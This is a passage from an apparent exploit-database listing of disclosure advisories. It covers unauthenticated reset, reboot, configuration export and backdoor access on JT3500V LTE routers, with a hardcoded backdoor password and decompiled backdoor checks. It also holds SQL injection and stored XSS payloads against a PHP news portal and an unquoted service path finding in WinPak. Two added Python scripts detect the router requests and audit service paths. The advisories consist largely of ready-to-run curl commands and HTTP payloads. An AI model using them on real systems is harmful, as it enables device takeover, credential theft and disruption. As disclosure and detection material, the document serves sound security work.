      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01

      Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

      Desc: The device allows unauthenticated attackers to visit the unprotected /goform/LoadDefaultSettings endpoint and reset the device to its factory default settings. Once the GET request is made, the device will reboot with its default settings allowing the attacker to bypass authentication and take full control of the system.

      Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
                 Linux 2.6.36+ (mips)
                 Mediatek APSoC SDK v4.3.1.0

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5642
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php

      03.02.2021

      --

      $ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
      success
      $
  20. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
      # Date: 03.02.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

      Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
      Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                        http://www.jatontec.com/products/show.php?itemid=258
                        http://www.jatontech.com/CAT12.html#_pp=105_564
                        http://www.kzbtech.com/AM3300V.html
                        https://neotel.mk/ostanati-paketi-2/

      Affected version:

      Model    | Firmware
      ---------|-----------
      JT3500V  | 2.0.1B1064
      JT3300V  | 2.0.1B1047
      AM6200M  | 2.0.0B3210
      AM6000N  | 2.0.0B3042
      AM5000W  | 2.0.0B3037
      AM4200M  | 2.0.0B2996
      AM4100V  | 2.0.0B2988
      AM3500MW | 2.0.0B1092
      AM3410V  | 2.0.0B1085
      AM3300V  | 2.0.0B1060
      AM3100E  | 2.0.0B981
      AM3100V  | 2.0.0B946
      AM3000M  | 2.0.0B21
      KZ7621U  | 2.0.0B14
      KZ3220M  | 2.0.0B04
      KZ3120R  | 2.0.0B01

      Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

      Desc: The device has several backdoors and hidden pages that allow remote code execution, overwriting of the bootrom and enabling debug mode.

      Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
                 Linux 2.6.36+ (mips)
                 Mediatek APSoC SDK v4.3.1.0

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5639
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php

      03.02.2021

      --

      Older and newer models differ in backdoor code. By navigating to /syscmd.html or /syscmd.asp pages an attacker can authenticate and execute system commands with highest privileges.

      Old models (syscmd.asp) password: super1234
      Newer models (syscmd.html) password: md5(WAN_MAC+version):

      $ curl -k https://192.168.1.1/goform/getImgVersionInfo
      {"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}

      ...
      pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
      if (*pcVar6 == 0) {
        pcVar6 = "6C:AD:EF:00:00:01";
      }
      memset(acStack280,0,0x100);
      sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
      ...
      psMd5Init(auStack112);
      psMd5Update(auStack112,local_10,local_c);
      psMd5Final(auStack112,uParm1);
      return;
      ...

      Another 2 backdoors exist using the websCheckCookie() and specific header strings.

      ...
      iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
      if (iVar2 != 0) {
        return 0xffffffff;
      }
      if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
         (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
        return 0xffffffff;
      ...
      if (iVar1 != 0) goto LAB_0047c304;
      LAB_0047c32c:
        WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
      LAB_0047c35c:
        __n = strlen(__s1);
        if (__n == 0) {
          snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
          WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
          system(acStack1560);
          websWrite(iParm1,"invalid command!");
          goto LAB_0047c3f8;
        }
      ...

      Bypass the backdoor password request and enable debug mode from within the web console:

      $('#div_check').modal('hide');     <--- syscmd.html
      g_password_check_alert.close();    <--- syscmd.asp
  21. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

Desc: The device allows unauthenticated attackers to restart the device with an HTTP GET request to /goform/RestartDevice page.

Tested on: GoAhead-Webs/2.5.0
           PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php

03.02.2021

--

$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$
  22. # Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Steps
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt

---
Parameter: MULTIPART name ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="name"

aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="category"

1
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="price"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="qty"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------15280280330873390203691218429--
---
  23. # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk

Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
                  http://www.jatontec.com/products/show.php?itemid=258
                  http://www.jatontech.com/CAT12.html#_pp=105_564
                  http://www.kzbtech.com/AM3300V.html
                  https://neotel.mk/ostanati-paketi-2/

Affected version: Model    | Firmware
                  ---------|-----------
                  JT3500V  | 2.0.1B1064
                  JT3300V  | 2.0.1B1047
                  AM6200M  | 2.0.0B3210
                  AM6000N  | 2.0.0B3042
                  AM5000W  | 2.0.0B3037
                  AM4200M  | 2.0.0B2996
                  AM4100V  | 2.0.0B2988
                  AM3500MW | 2.0.0B1092
                  AM3410V  | 2.0.0B1085
                  AM3300V  | 2.0.0B1060
                  AM3100E  | 2.0.0B981
                  AM3100V  | 2.0.0B946
                  AM3000M  | 2.0.0B21
                  KZ7621U  | 2.0.0B14
                  KZ3220M  | 2.0.0B04
                  KZ3120R  | 2.0.0B01

Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service.

Desc: JT3500V is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the export_settings.cgi file using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access.

Tested on: GoAhead-Webs/2.5.0
           PeerSec-MatrixSSL/3.1.3-OPEN
           Linux 2.6.36+ (mips)
           Mediatek APSoC SDK v4.3.1.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php

03.02.2021

--

$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb  4 11:31 config.dat
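The JT3500V advisories above (ZSL-2021-5639, ZSL-2021-5642, ZSL-2021-5643 and ZSL-2021-5644) all come down to a handful of management endpoints that should never be reachable by anyone but an administrator. The following is an added example written for this listing, not code from the advisories or the vendor: a small detector that reads access logs in Apache/nginx "combined" format and flags requests to those endpoints from non-trusted hosts. It assumes a reverse proxy, WAF or IDS in front of the CPE's management interface writes such logs (the device's own GoAhead server does not), and the log lines are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Management endpoints named in the ZSL-2021-5639/5642/5643/5644 advisories above.
# A request to any of them from a host that is not a known admin station is alert-worthy.
WATCHED_ENDPOINTS = {
    "/goform/LoadDefaultSettings": "unauthenticated factory reset (ZSL-2021-5642)",
    "/goform/RestartDevice": "unauthenticated reboot (ZSL-2021-5643)",
    "/cgi-bin/export_settings.cgi": "unauthenticated config export (ZSL-2021-5644)",
    "/syscmd.html": "hidden system-command page (ZSL-2021-5639)",
    "/syscmd.asp": "hidden system-command page (ZSL-2021-5639)",
    "/goform/getImgVersionInfo": "firmware version lookup feeding the debug-password scheme (ZSL-2021-5639)",
}

# Apache/nginx "combined" access-log format. Assumption: a proxy, WAF or IDS in front of
# the CPE management interface produces these lines; the CPE itself does not.
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines for the demonstration, not captured traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2021:11:31:02 +0100] "GET /goform/RestartDevice HTTP/1.1" 200 7 "-" "curl/7.64.0"
203.0.113.7 - - [04/Feb/2021:11:31:40 +0100] "GET /cgi-bin/export_settings.cgi HTTP/1.1" 200 5632 "-" "curl/7.64.0"
192.168.1.50 - - [04/Feb/2021:11:32:11 +0100] "GET /index.html HTTP/1.1" 200 1803 "-" "Mozilla/5.0"
198.51.100.9 - - [04/Feb/2021:11:33:05 +0100] "GET /syscmd.html?x=1 HTTP/1.1" 200 2211 "-" "python-requests/2.25"
192.168.1.50 - - [04/Feb/2021:11:34:00 +0100] "POST /goform/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_combined(line):
    """Return the fields of one combined-format line as a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Match on the path only, so "/syscmd.html?x=1" is still caught.
    rec["path"] = urlsplit(rec["target"]).path
    return rec


def find_sensitive_requests(log_text, trusted_sources=()):
    """Return (src, ts, path, reason, status) for each request to a watched endpoint.

    Requests from hosts listed in trusted_sources (e.g. the admin workstation) are
    skipped so that routine maintenance does not raise an alert.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None or rec["src"] in trusted_sources:
            continue
        reason = WATCHED_ENDPOINTS.get(rec["path"])
        if reason:
            hits.append((rec["src"], rec["ts"], rec["path"], reason, rec["status"]))
    return hits


if __name__ == "__main__":
    for src, ts, path, reason, status in find_sensitive_requests(SAMPLE_LOG):
        print(f"{ts}  {src:<14} {status}  {path:<32} {reason}")
```

Run against the constructed sample it reports the reboot, the config export and the hidden command page and ignores the ordinary login and index requests. A 200 on `/cgi-bin/export_settings.cgi` with a multi-kilobyte response size is the strongest signal in the set, since that is the configuration file leaving the device; the network-side fix is to keep the management interface off the WAN and restrict it to the admin hosts that would appear in `trusted_sources`.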
  24. # Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Multiple endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.

# One

POST /pos_inv/admin/addcustomer.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
Content-Length: 661
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/customer.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="name"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="address"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="contact"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="username"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741
Content-Disposition: form-data; name="password"

<script>alert(`Stored XSS`)</script>
-----------------------------26863080316712198253766739741--

# Two

http://127.0.0.1/pos_inv/admin/supplier.php

POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/supplier.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa

# Three

http://127.0.0.1/pos_inv/admin/product.php

POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
Content-Length: 844
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/admin/product.php
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="name"

ACER Aspire GX-781 Gaming PC <script>alert(1)</script>
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="category"

2
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="supplier"

0
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="price"

749.99
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="qty"

1000
-----------------------------11435260685310908573266876009
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------11435260685310908573266876009--
  25. # Exploit Title: Winpakpro 4.8 - 'GuardTourService' Unquoted Service Path
# Discovery by: Alan Mondragon
# Discovery Date: 2021-03-16
# Vendor Homepage: https://www.security.honeywell.com/product-repository/winpak
# Software Links : https://www.security.honeywell.com/product-repository/winpak
# WinPackPro
# Tested Version: 4.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits

# Step to discover Unquoted Service Path:

C:\WINDOWS\system32>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

WIN-PAK Guard Tour Server    GuardTourService    C:\Program Files (x86)\WINPAKPRO\WP GuardTour Service.exe    Auto

C:\Users\jorge.irigoyen>sc qc "GuardTourService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: CtesDurSvc
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START  (DELAYED)
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\WINPAKPRO\WP GuardTour Service.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : WIN-PAK Guard Tour Server
        DEPENDENCIAS       : WPDatabaseService
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
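The `wmic ... | findstr` pipeline above is the usual way to audit a host for this class of finding. The following is an added example, written for this listing and not part of the advisory or of Honeywell's software: it applies the same three criteria (auto-start, binary path outside `C:\Windows`, unquoted path containing spaces) to service records and also produces the quoted `binPath=` value an administrator would set to close the finding. The service records are constructed for the demonstration; the WINPAKPRO entry mirrors the advisory's output, the others are invented for contrast.

```python
import re

# A quoted binary path: the executable is the quoted token, any arguments follow it.
QUOTED_RE = re.compile(r'^\s*"([^"]+)"')


def executable_path(pathname):
    """Return (exe_path, quoted) from a service PathName / BINARY_PATH_NAME value."""
    m = QUOTED_RE.match(pathname)
    if m:
        return m.group(1), True
    # Unquoted: the Service Control Manager tries each space-delimited prefix in turn,
    # so the intended executable is everything up to and including the first ".exe".
    m = re.match(r'^\s*(.*?\.exe)(?=\s|$)', pathname, re.IGNORECASE)
    exe = m.group(1) if m else pathname.strip().split(" ")[0]
    return exe, False


def is_exploitable_unquoted(pathname):
    """True when the path is unquoted, contains a space and lives outside %SystemRoot%."""
    exe, quoted = executable_path(pathname)
    if quoted or " " not in exe:
        return False
    # C:\Windows is excluded, as in the advisory's findstr filter: standard users
    # cannot create files there, so the SCM's prefix search cannot be hijacked.
    return not exe.lower().startswith("c:\\windows")


def audit_services(services):
    """Names of auto-start services whose binary path is unquoted and contains spaces."""
    return [
        s["name"]
        for s in services
        if s["startmode"].lower() == "auto" and is_exploitable_unquoted(s["pathname"])
    ]


def quoted_binpath(pathname):
    """The corrected value to pass to `sc config <name> binPath=` for an unquoted path."""
    exe, quoted = executable_path(pathname)
    if quoted:
        return pathname
    args = pathname.strip()[len(exe):]
    return f'"{exe}"{args}'


# Constructed records in the shape of `wmic service get name,pathname,startmode`.
# Only the WINPAKPRO entry reflects the advisory; the rest are made up for contrast.
SAMPLE_SERVICES = [
    {"name": "GuardTourService",
     "pathname": r"C:\Program Files (x86)\WINPAKPRO\WP GuardTour Service.exe",
     "startmode": "Auto"},
    {"name": "QuotedSvc",
     "pathname": r'"C:\Program Files\Example\svc.exe" -run',
     "startmode": "Auto"},
    {"name": "wuauserv",
     "pathname": r"C:\Windows\system32\svchost.exe -k netsvcs",
     "startmode": "Manual"},
    {"name": "ManualSpaced",
     "pathname": r"C:\Tools Dir\agent.exe --service",
     "startmode": "Manual"},
]

if __name__ == "__main__":
    for name in audit_services(SAMPLE_SERVICES):
        rec = next(s for s in SAMPLE_SERVICES if s["name"] == name)
        print(f"{name}: unquoted -> sc config {name} binPath= \"{quoted_binpath(rec['pathname'])}\"")
```

On the constructed sample only `GuardTourService` is reported; `ManualSpaced` has the same path shape but is not auto-start, so it would not run at boot without user interaction, and `wuauserv` is excluded by the `C:\Windows` rule. The remediation the script prints is the standard one: wrap the executable in quotes with `sc config <name> binPath= "\"C:\path with spaces\svc.exe\""` (or have the vendor's installer register it quoted), then re-run the audit to confirm the path now starts with a quote.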